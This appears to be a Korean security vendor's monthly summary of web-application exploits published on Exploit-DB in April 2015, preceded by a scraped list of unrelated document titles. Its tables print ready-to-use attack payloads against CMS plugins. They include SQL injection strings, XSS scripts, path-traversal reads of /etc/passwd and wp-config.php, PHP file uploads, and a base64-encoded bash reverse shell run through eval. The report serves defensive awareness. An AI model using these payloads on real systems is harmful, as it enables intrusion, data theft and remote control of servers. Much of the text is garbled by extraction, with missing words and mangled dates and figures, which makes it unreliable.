36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad

Similar documents
76 XSS 하 Huge-IT Slider admin.php XSS

EDB 분석보고서 (04.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

EDB 분석보고서 (06.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 File Upload 하 C

EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL

EDB 분석보고서 (04.03) ~ Exploit-DB( 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu

EDB 분석보고서 (06.07) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

EDB 분석보고서 (04.09) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Like Dislike Counter..3 Plugin - ajax_coun

날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 Directory Traversal 하 EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된취약

EDB 분석보고서 (05.08) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 7/08/ File Upload 하중.

EDB 분석보고서 (208.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 SQL Injection Smart Google Code Inserter < 3.5 P

POST /process.php HTTP/ XSS 중중 Command Injection 상상 EPESI.8.2 rev XSS ClipBucket Remote Code Execution

3708 하 중 Landing Pages Plugin post.php 3708 XSS 하 중 Landing Pages Plugin post-new.php 3707 하 중 NewStatPress Plugin admin.php 3707

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 /picosafe_webgui/webint

EDB 분석보고서 (06.0) ~ Exploit-DB( 에공개된취약점별로분류한정보입니다 PHP Imagick / command injection 취약점 /image.j

ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O

Portal_9iAS.ppt [읽기 전용]

3장

제목 레이아웃

105È£4fš

untitled

Microsoft PowerPoint - Smart CRM v4.0_TM 소개_ pptx

t

Secure Programming Lecture1 : Introduction

HTML5가 웹 환경에 미치는 영향 고 있어 웹 플랫폼 환경과는 차이가 있다. HTML5는 기존 HTML 기반 웹 브라우저와의 호환성을 유지하면서도, 구조적인 마크업(mark-up) 및 편리한 웹 폼(web form) 기능을 제공하고, 리치웹 애플리케이 션(RIA)을

untitled

untitled

PCServerMgmt7

오늘날의 기업들은 24시간 365일 멈추지 않고 돌아간다. 그리고 이러한 기업들을 위해서 업무와 관련 된 중요한 문서들은 언제 어디서라도 항상 접근하여 활용이 가능해야 한다. 끊임없이 변화하는 기업들 의 경쟁 속에서 기업내의 중요 문서의 효율적인 관리와 활용 방안은 이

23

4임금연구겨울-지상토론

6강.hwp

1~10

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

? Search Search Search Search Long-Tail Long-Tail Long-Tail Long-Tail Media Media Media Media Web2.0 Web2.0 Web2.0 Web2.0 Communication Advertisement

10X56_NWG_KOR.indd

Observational Determinism for Concurrent Program Security

ODS-FM1

第 1 節 組 織 11 第 1 章 檢 察 의 組 織 人 事 制 度 등 第 1 項 大 檢 察 廳 第 1 節 組 대검찰청은 대법원에 대응하여 수도인 서울에 위치 한다(검찰청법 제2조,제3조,대검찰청의 위치와 각급 검찰청의명칭및위치에관한규정 제2조). 대검찰청에 검찰총장,대

<4D F736F F D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

<4D F736F F F696E74202D E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA E >

Backup Exec

untitled

Connection 8 22 UniSQLConnection / / 9 3 UniSQL OID SET

<%DOC NAME%> User Manual

vm-웨어-01장

목순 차서 v KM의 현황 v Web2.0 의 개념 v Web2.0의 도입 사례 v Web2.0의 KM 적용방안 v 고려사항 1/29

< FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

±èÇö¿í Ãâ·Â

FMX M JPG 15MB 320x240 30fps, 160Kbps 11MB View operation,, seek seek Random Access Average Read Sequential Read 12 FMX () 2

Windows Live Hotmail Custom Domains Korea

Facebook API

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

목 차 1장 - 페이스북 콘텐츠의 유형 2장 - 콘텐츠 주제와 목표 구매자 설정 3장 - 체계적인 계획 수립 4장 - 포스트 옵션의 이해 5장 - 효과적인 콘텐츠 작성 6장 - 페이스북 광고 7장 - 페이스북 인사이트 8장 - 페이스북 엣지랭크

ESET Mobile Security for Android

PowerPoint 프레젠테이션

スライド タイトルなし

FileMaker 15 WebDirect 설명서

CLX8380_KR.book

소프트웨어개발방법론

초보자를 위한 ADO 21일 완성

<%DOC NAME%> User Manual

품질검증분야 Stack 통합 Test 결과보고서 [ The Bug Genie ]

Cover_KD-R646[U]004A_1.indd 2 2

초보자를 위한 C++

LCD Display

pdf

Sena Device Server Serial/IP TM Version

4? [The Fourth Industrial Revolution] IT :,,,. : (AI), ,, 2, 4 3, : 4 3.

기타자료.PDF

1217 WebTrafMon II

: Symantec Backup Exec System Recovery 8:

Spotlight on Oracle V10.x 트라이얼프로그램설치가이드 DELL SOFTWARE KOREA

DocsPin_Korean.pages


CD-RW_Advanced.PDF

FreeBSD Handbook

WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진

HTML5* Web Development to the next level HTML5 ~= HTML + CSS + JS API

특허청구의 범위 청구항 1 게임 서버 또는 미들웨어에 의해, 사용자 단말기로부터, GPS 정보, IP 정보, 중계기 정보 중 적어도 하나를 이 용한 위치 정보와, 상기 사용자 단말기에 설정된 언어 종류를 포함하는 사용자 정보를 수신하는 단계; 상기 게임 서버 또는 미들

Cache_cny.ppt [읽기 전용]

네트워크 안정성을 지켜줄 최고의 기술과 성능 TrusGuard는 국내 최초의 통합보안솔루션으로서 지난 5년간 약 4천여 고객 사이트에 구축 운영되면서 기술의 안정성과 성능면에서 철저한 시장 검증을 거쳤습니다. 또한 TrusGuard는 단독 기능 또는 복합 기능 구동 시

NoSQL

thesis

본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인

<5B4E DBDBAB8B6C6AEC4DCC5D9C3F720BFF9B0A3B5BFC7E2BAB8B0ED5F35C8A32838BFF9292E687770>

Windows 네트워크 사용 설명서

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

1

Copyright 2012, Oracle and/or its affiliates. All rights reserved.,.,,,,,,,,,,,,.,...,. U.S. GOVERNMENT END USERS. Oracle programs, including any oper

Microsoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc

Corporate PPT Template

EDB 분석보고서 (06.06) ~ Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 Code

Social Network

05Àå

EDB 분석보고서 (05.03) ~ Exploit-DB( 에공개된별로분류한정보입니다 상 상 Spider FAQ - index.php 상 Gallery WD - index.php 36

User's Guide Manual

Model Investor MANDO Portal Site People Customer BIS Supplier C R M PLM ERP MES HRIS S C M KMS Web -Based

Chapter 1

Transcription:

분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (205.04) 205.04.0~205.04.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 205 년 4 월에공개된 Exploit-DB 의분석결과, 공격에대한보고개수가가장많았습니다. 대부분의 공격이 CMS 에서발견되습니다. CMS 에서는 뿐만아니라 Cross Site Scripting(XSS) 과 File Upload 와같은다양한역시다수발견되었으며, 4 월가장많은이보고된소프트웨어로확인되었습니다. 의은대부분 에서발생되므로 를사용하는관리자는주기적으로진단또는 업데이트를실시하여보안성을유지해야합니다. 또한 소프트웨어에서 2 개의이발견되었습니다. 해당은소스코드에의한이며, 단순한공격패턴만으로악용가능합니다. 난이도가낮은반면매우큰피해를줄수있기때문에각별히주의할필요가있습니다.. 별보고개수 보고개수 Command File Upload 3 XSS 4 LFI 6 9 총합계 33 35 30 25 20 5 0 5 0 Command 33 별보고개수 9 6 3 4 File Upload XSS LFI 총합계 2. 위험도별분류위험도 보고개수 백분율 6 48.48% 중 7 5.52% 위험도별분류 하 0 0.00% 합계 33 00.00% 7 6 중 3. 공격난이도별현황공격난이도 보고개수 백분율 6 8.8% 중 9 27.27% 하 8 54.55% 총합계 33 00.00% 공격난이도별현황 6 8 9 중 하 4. 주요소프트웨어별발생현황소프트웨어이름 Ericsson phpsfp Balero BlueDragon CFChart Servlet Wolf 총합계 보고개수 2 2 2 33 주요소프트웨어별발생현황 6% 6% 64% Ericsson phpsfp Balero ** 5개이발생한주요소프트웨어별세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3664 File Upload 하 Simple Ads Manager 2.5.94 - sam-ajax-admin.php File Upload 3663 하 중 Simple Ads Manager - sam-ajax.php 3663 하 중 Simple Ads Manager - /sam-ajax-admin.php 36600 Business Intelligence - view.php 36677 중 Traffic Analyzer 3.4.2 - / 3667 중 All In One WP Security & Firewall 3.9.0 - admin.php 3669 File Upload 하 Windows Desktop and iphone Photo Uploader - upload.php File Upload 36735 중 Duplicator <= 0.5.4 - admin-ajax.php 36733 LFI 하 중 'WP Mobile Edition' 2.7 - css.php LFI 36762 XSS 하 중 MiwoFTP.0.5 - admin.php XSS 3675 하 중 Video Gallery 2.8 - admin-ajax.php 3676 LFI 하 중 MiwoFTP.0.5 - admin.php LFI 36777 중 중 Ajax Store Locator.2 - admin-ajax.php 36805 하 중 Community Events.3.5 - /

36802 Tune Library.5.4 - / 36800 중 NEX-Forms < 3.0 - admin-ajax.php 36824 하 중 Ultimate Product Catalogue - / 36823 하 중 Ultimate Product Catalogue - admin-ajax.php 36860 LFI 하 TheCartPress.3.9 - admin.php LFI 36860 XSS 하 중 TheCartPress.3.9 - /shopping-cart/checkout/ XSS 36860 XSS 하 중 TheCartPress.3.9 - admin.php XSS

날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 205-04-02 3669 LFI 중 205-04-02 3666 EDB 분석보고서 (205.04) 205.04.0~205.04.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Ericsson Drutt MSDP (Instance Monitor) - / LFI phpsfp Schedule Facebook Posts.5.6 - /index.php/login /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd GET /index.php/login HTTP/. Cookie: login= ' or extractvalue(rand(),concat(0x2e,(select concat_ws(0x3a,username,password) from users limit ))) or ' 2 Ericsson phpsfp Ericsson Drutt MSDP (Instance Monitor) phpsfp - Schedule Facebook Posts.5.6 205-04-02 3664 File Upload 하 Simple Ads Manager 2.5.94 - sam-ajax-admin.php File Upload POST /wp-content/plugins/simple-ads-manager/sam-ajaxadmin.php HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd0029908f2 plugin Simple Ads Manager 2.5.94 -----------------------------7dd0029908f2 Content-Disposition: form-data; name="uploadfile"; filename="info.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd0029908f2-- 205-04-02 3663 하중 Simple Ads Manager - sam-ajax.php POST /wp-content/plugins/simple-ads-manager/samajax.php HTTP/. plugin Simple Ads Manager 2.5.94 and 2.5.96 action=sam_hits&hits%5b0%5d%5b%5d= and =&hits%5b%5d%5b%5d= and =&hits%5b2%5d%5b%5d= and =&level=3 205-04-02 3663 하중 Simple Ads Manager - /sam-ajax-admin.php POST/wp-content/plugins/simple-ads-manager/sam-ajaxadmin.php HTTP/. plugin Simple Ads Manager 2.5.94 and 2.5.96 action=load_posts&cstr= and =&sp=post&spg=page 205-04-02 3660 Spider Random Article Componen - index.php /index.php?option=com_rand&catid=%27%20and(selec t%20%20from(select%20count(*),concat((select%20( select%20concat(database(),0x27,0x7e))%20from%20i nformation_schema.tables%20limit%200,),floor(rand(0 )*2))x%20FROM%20information_schema.tables%20GR OUP%20BY%20x)a)--%20- &limit=&style=&view=articles&format=raw&itemid=3 Spider Random Article Component 205-04-02 36600 205-04-05 3664 Business Intelligence - view.php - adsearch.php /wp-content/plugins/wp-business-intelligence/view.php?t=337+union+select+,2,3,group_concat(table_name), 5,6,7,8,9,0,+from+information_schema.tables+where +table_schema=database()--%20 /adsearch.php=action=search&buyitnow=y&buyitnowonly =y&category=%20and%20= Business Intelligence 205-04-08 36678 LFI 하 Configuration Management.3. - /zenworks/uploadservlet LFI POST /zenworks/uploadservlet?uid=../../../opt/novell/zenworks/ share/tomcat/webapps/&filename=payload.war HTTP/. Configuration Management.3. 205-04-08 36677 중 Traffic Analyzer 3.4.2 - / GET / HTTP/. x.x.x.x Referer: BLAH' (SELECT 'Fdsf' FROM DUAL WHERE 5435=5435 and SLEEP(30) ) ' Traffic Analyzer 3.4.2 205-04-08 36675 중중 Balero CMS 0.7.2 - /balerocms/admin/edit_page/m od-virtual_page/id- POST /balerocms/admin/edit_page/mod-virtual_page/id- HTTP/. Balero Balero CMS 0.7.2 id=' and benchmark (50000000,sha())--

EDB 분석보고서 (205.04) 205.04.0~205.04.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 205-04-08 36674 XSS 중중 7.6.0.3 - adminajax.php XSS POST/wordpress-install/wp-admin/admin-ajax.php HTTP/. 7.6.0.3 location[id]='><script>alert(string.fromcharcode(88,83,83 ));</script> 205-04-08 3667 중 All In One WP Security & Firewall 3.9.0 - admin.php /wpadmin/admin.php?page=aiowpsec&tab=tab3&orderby=us er_id,(select * from (select(sleep(30)))a)&order=asc All In One WP Security & Firewall 3.9.0 205-04-09 3669 File Upload 하 Windows Desktop and iphone Photo Uploader - upload.php File Upload POST /wordpress/wp-content/plugins/i-dump-iphone-towordpress-photo-uploader/uploader.php HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd0029908f2 -----------------------------7dd0029908f2 Content-Disposition: form-data; name="uploadfile"; filename="file.php" Content-Type: application/octet-stream Windows Desktop and iphone Photo Uploader <? phpinfo();?> -----------------------------7dd0029908f2-- 205-04-3 36735 중 Duplicator <= 0.5.4 - admin-ajax.php POST /wp-admin/adminajax.php?action=duplicator_package_delete HTTP/. Duplicator <= 0.5.4 duplicator_delid= and (select * from (select(sleep(20)))a) 205-04-3 36733 LFI 하중 'WP Mobile Edition' 2.7 - css.php LFI /wp-content/themes/mtheme- Unus/css/css.php?files=../../../../wp-config.php 'WP Mobile Edition' 2.7 205-04-4 36762 XSS 하중 MiwoFTP.0.5 - admin.php XSS /wordpress/wpadmin/admin.php?page=miwoftp&option=com_miwoftp &action=list&dir=wpcontent"><script>alert()</script>&order=name&srt=yes MiwoFTP.0.5 205-04-4 3675 하중 Video Gallery 2.8 - /wp-admin/admin- admin-ajax.php 취 ajax.php?action=googleadsense&vid=%20and%20=-- 약점 Video Gallery 2.8 205-04-4 3676 LFI 하중 MiwoFTP.0.5 - admin.php LFI POST /wordpress/wpadmin/admin.php?page=miwoftp&option=com_miwoftp &action=post HTTP/. MiwoFTP.0.5 do_action=delete&first=y&selitems[]=../../../../../pls_mr_jai ler_dont_deleteme.txt 205-04-6 36777 중중 Ajax Store Locator.2 - admin-ajax.php /wordpress/wp-admin/adminajax.php?action=sl_dal_searchlocation&funmethod=searc hstore&location=social&storelocation=~ AND (SELECT * FROM (SELECT(SLEEP(0)))LCKZ) Ajax Store Locator.2 205-04-2 3685 LFI 하중 BlueDragon CFChart Servlet 7...7759 - /cfchart.cfchart LFI /cfchart.cfchart?..\..\..\..\..\..\..\..\..\..\index.p hp BlueDragon CFChart Servlet BlueDragon CFChart Servlet 7...7759 205-04-2 36805 하 중 205-04-2 36802 205-04-2 36800 중 Community Events.3.5 - / Tune Library.5.4 - / /?page_id=2&eventyear=205 AND = )-- &dateset=on&eventday= /?page_id=2&artistletter=g' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database( )),2--%20 NEX-Forms < 3.0 - /wordpress/wp-admin/adminajax.php?action=submit_nex_form&nex_forms_id=0 admin-ajax.php AND (SELECT * FROM (SELECT(SLEEP(0)))NdbE) Community Events.3.5 Tune Library.5.4 NEX-Forms < 3.0

EDB 분석보고서 (205.04) 205.04.0~205.04.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 205-04-2 36807 하중 3.3-406088000 - /go_login/validate_credentials/admin/%27%20or%20% /go_login/validate_credentials/a 27%27%3D%27 dmin/ 3.3-406088000 205-04-2 36807 Command 3.3-406088000 - /index.php/go_site/cpanel/ Command /index.php/go_site/cpanel/ bash -c "eval \`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTEvND Q0NCAwPiYx base64 --decode\`" 3.3-406088000 205-04-22 3688 File Upload 하중 Wolf CMS 0.8.2 - /admin/login/login File Upload POST /admin/login/login HTTP/. Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-kr User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------- ------------7dd0029908f2 Wolf Wolf CMS 0.8.2 -----------------------------7dd0029908f2 Content-Disposition: form-data; name="upload_file"; filename="shell.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd0029908f2-- 205-04-23 36824 하 중 205-04-23 36823 하 중 Ultimate Product Catalogue - / Ultimate Product Catalogue - adminajax.php /?SingleProduct=2'+and+'a'='a POST /wp-admin/admin-ajax.php HTTP/. Ultimate Product Catalogue Ultimate Product Catalogue Item_ID=2 AND SLEEP(5)&action=record_view 205-04-29 36862 중 OS Solution OSProperty 2.8.0 - index.php /index.php?option=com_osproperty&no_html=&tmpl=co mponent&task=ajax_loadstateinlistpage&country_id=3' UNION ALL SELECT NULL,CONCAT(0x76a6277,0x797774584a4b495474 d,0x7627707)# OS Solution OSProperty 2.8.0 205-04-29 36860 LFI 하 TheCartPress.3.9 - admin.php LFI POST /wpadmin/admin.php?page=checkout_editor_settings HTTP/. TheCartPress.3.9 tcp_save_fields=&tcp_box_path=../../../../../etc/passwd 205-04-29 36860 XSS 하중 TheCartPress.3.9 - /shoppingcart/checkout/ XSS POST /shopping-cart/checkout/ HTTP/. TheCartPress.3.9 selected_billing_id=&selected_billing_address=new&billin g_firstname="><script>alert(/immuniweb/);</script>

EDB 분석보고서 (205.04) 205.04.0~205.04.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대프로그램대환경 205-04-29 36860 XSS 하중 TheCartPress.3.9 - admin.php XSS /wpadmin/admin.php?page=thecartpress/admin/addresseslist.php&search_by=-- %3E%%27%22%3E%3Cscript%3Ealert%28%27immu niweb%27%29;%3c/script%3e TheCartPress.3.9